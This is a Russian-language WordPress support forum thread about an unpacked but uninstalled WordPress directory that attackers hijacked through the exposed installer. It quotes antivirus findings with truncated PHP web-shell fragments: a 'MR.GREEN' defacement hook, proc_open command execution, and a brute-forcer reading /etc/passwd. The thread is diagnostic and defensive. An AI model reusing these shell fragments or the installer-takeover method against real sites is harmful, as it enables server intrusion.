• Ситуация такая. Не давно решил поставить сайт. Ночью скачал архив от сюда, последняя версия 6.3.1. Распаковал, и установку оставил на утро, пошёл спать. Скрипт находится в папке wordpress. Утром захожу, и в этой папке появились лишний папки и файлы. Сканирования антивируса показало что сайт заражён, точнее даже не сайт а скрипт который даже ещё не установлен. Был загружен web hell, что пришлось и системные папки чистить от этой дряни.

    Сразу хочу ответить что не один пункт в этой рубрике https://ru.wordpress.org/support/article/faq-hacked/ не попадает. И хостинг не дырявый, только с этим скриптом такое произошло.

    Данный движок мне всегда нравился, но сейчас это что-то. Чистый движок, даже не установленный с язвами.

Просмотр 10 ответов — с 1 по 10 (всего 10)
  • Модератор Юрій

    (@yube)

    Чистый движок, даже не установленный с язвами.

    Всё может быть, спору нет. «И на старуху бывает проруха, как сказала польская красавица Инга Зайонц через месяц после свадьбы с другом моего детства Колей Остен-Бекеном.» Но чтобы быть настолько категоричным, нужно иметь доказательства посерьезней, чем «хостинг не дырявый» или «у меня вирусов точно нет». Извините за прямоту.

    var/www/vvv/data/www/vvv/wordpress/wp-content/plugins/eea6b92b52cb493ca723a988179bfa5e/Green.php
    
    [x] <?php add_action("admin_menu",function(){add_object_page("MR.GREEN","MR.GREEN","administrator","Green",function(){echo " <center>Hacked BY MR.GREEN</center><br><center>Contact Me ICQ Account : 747252180</center><br><center><br>";if(isset($_
    
    09/09/2023 05:50:14
    
    09/09/2023 05:50:14
    
    1.19 Kb
    
    /var/www/vvv/data/www/vvv/wordpress/wp-content/plugins/eea6b92b52cb493ca723a988179bfa5e/n/index.php
    
    [x] …n($in,"r"))){$out="";while(!feof($f))$out.=fread($f,1024);pclose($f);}}elseif($func[49]('proc_open')){$pipes=[];$process =proc_open($in.' 2>&1',array(array("pipe","w"),array("pipe","w"),array("pipe","w")),$pipes,null);$out=stream_get_conten
    
    09/09/2023 05:50:14
    
    09/09/2023 05:50:14
    
    31.42 Kb
    
    /var/www/vvv/data/www/vvv/wordpress/wp-content/plugins/eea6b92b52cb493ca723a988179bfa5e/991176.php
    
    [x] …$value){$_POST[$key]=stripslashes($value);}}?><!DOCTYPE html><html><head><link href="" rel="stylesheet" type="text/css"> <title>Mini Shell By Black_Shadow</title><link href='https://fonts.googleapis.com/css?family=VT323' rel='stylesheet'><s
    
    09/09/2023 05:50:14
    
    09/09/2023 05:50:14
    
    7.54 Kb
    
    /var/www/vvv/data/www/vvv/wordpress/wp-content/plugins/eea6b92b52cb493ca723a988179bfa5e/xt/mmd/shell/index.php
    
    [x] …ct($str);pg_close($res);return$res;}}$success=0;$attempts=0;$server=explode(":",$_POST['server']);if($_POST['type']==1){ $temp=file('/etc/passwd');if(is_array($temp)) foreach($temp as$line){$line=explode(":",$line);++$attempts;if(bruteForce
    
    09/09/2023 05:50:14
    
    09/09/2023 05:50:14
    
    47.55 Kb
    
    /var/www/vvv/data/www/vvvv/wordpress/wp-content/plugins/eea6b92b52cb493ca723a988179bfa5e/mm/mmd/index.php
    
    [x] …n($in,"r"))){$out="";while(!feof($f))$out.=fread($f,1024);pclose($f);}}elseif($func[49]('proc_open')){$pipes=[];$process =proc_open($in.' 2>&1',array(array("pipe","w"),array("pipe","w"),array("pipe","w")),$pipes,null);$out=stream_get_conten
    
    09/09/2023 05:50:14
    
    09/09/2023 05:50:14
    
    32.76 Kb
    
    /var/www/vvv/data/www/vvv/kjagffassay44712/UuAxsAzLWYxPNdchENtW/index.php
    
    [x] …ct($str);pg_close($res);return$res;}}$success=0;$attempts=0;$server=explode(":",$_POST['server']);if($_POST['type']==1){ $temp=file('/etc/passwd');if(is_array($temp)) foreach($temp as$line){$line=explode(":",$line);++$attempts;if(bruteForce

    Результаты проверки антивирусом. Ещё доказательства? Вбейте в поисковиках Hacked BY MR.GREEN и очень много сайтов взломаных будет.

    >точнее даже не сайт а скрипт который даже ещё не установлен. — вы реально думаете, что если скрипт «не установлен», то его нельзя запустить?

    Модератор Юрій

    (@yube)

    Ещё доказательства?

    Да. То, что Вы показали, доказательсво наличия заразы — чужеродных фалов — на сайте, а не вины Вордпресса. Вот если бы Вы показали что-то заразное внутри файла движка прямо в архиве, это было бы доказательство. Или без подробностей(!) описали алгоритм взлома свежеустановленного Вордпресса.

    Поверьте, за полтора десятка лет, что я работаю с Вордпрессом, я ооочень много раз видел «караул! вордпресс дырявый!», и почти всегда виноватым оказывался не Вордпресс, а хостинг (лично мне сломали несколько сайтов на одном хостинге), темы/плагины с помоек, сторонние библиотеки, вирусы на компе у админа и т.д. Но и в самом Вордпрессе находили уязвимости, в том числе серьезные. Если действительно дыра в новой версии, нужно как можно скорее ее закрыть. И тут без помощи админов взломанных сайтов не обойтись.

    Если бы он уже был бы установлен то попытался бы разобраться где и как смогли его сломать. А про хостинг, так у меня на нем ещё несколько сайтов на других движка и без происшествий, а на wp произошло.

    efess, и как можно установить не имея доступа к хостингу? Может потому что установщик был активен, но всё равно как так может быть, движок не где-то скачивал а с официального сайта.

    Модератор Yui

    (@fierevere)

    永子

    kotden, а от нас вы в этой теме чего хотите? Помощи и советов по лечению сайта? ( и всего прочего )

    или просто пошуметь пришли?

    дырки у вас, доказывать вам это никто не будет , можете с мистером Грином общаться, если хотите похайповать, а может у вас просто пароль админа qwerty

    Модератор Юрій

    (@yube)

    @kotden, у Вас есть возможность посмотреть логи сервера за ночь. Поскольку Вы ничего не делали, то там будет не много записей. Если бы были даты-время создания левых файлов, то было бы немного проще найти то, что происходило именно в это время, какие скрипты вызывались. Ну а так придется смотреть с подозрением на все запросы, разве что кроме / и /robots.txt от поисковиков.

    Если абсолютно ничего подозрительного не увидите, значит зараза проникла не через http.

    • Ответ изменён 1 год, 1 месяц назад пользователем Юрій.
    Anonymous User 20889438

    (@anonymized-20889438)

    @kotden, привет.

    Чистый движок, даже не установленный с язвами.

    и как можно установить не имея доступа к хостингу?

    Очень простой вопрос: вы не установили WordPress, то есть просто наружу торчала директория с дистрибутивом? А потом вы что конкретно увидели?

    Судя по некоторым артефактам, что вы предоставили выше, установку произвели за вас, и в автоматическом режиме.

    Теперь два факта: взлом «Hacked BY MR.GREEN» известен уже три года как, эксплуатация установщика WordPress (в данном случае) известна уже более десяти лет.

    Это если распаковал то сразу надо ставить? Если так то пойду делать сайт. А тему эту создал, хотел узнать более подробно. Просто в интернете такой информации я не нашёл. В последнем комментарии дан ответ что меня интересовало.

    всем спасибо!

    • Ответ изменён 1 год, 1 месяц назад пользователем kotden.
    Anonymous User 20889438

    (@anonymized-20889438)

    @kotden,

    Это если распаковал то сразу надо ставить?

    Именно так. Иначе есть 99.99% шанс, что это сделают за вас, с чем вы, собственно, и столкнулись.

    Просто в интернете такой информации я не нашёл. В последнем комментарии дан ответ что меня интересовало.

    Бывает. Рад, что вопрос прояснился.

Просмотр 10 ответов — с 1 по 10 (всего 10)
  • Тема «WordPress уязвим?» закрыта для новых ответов.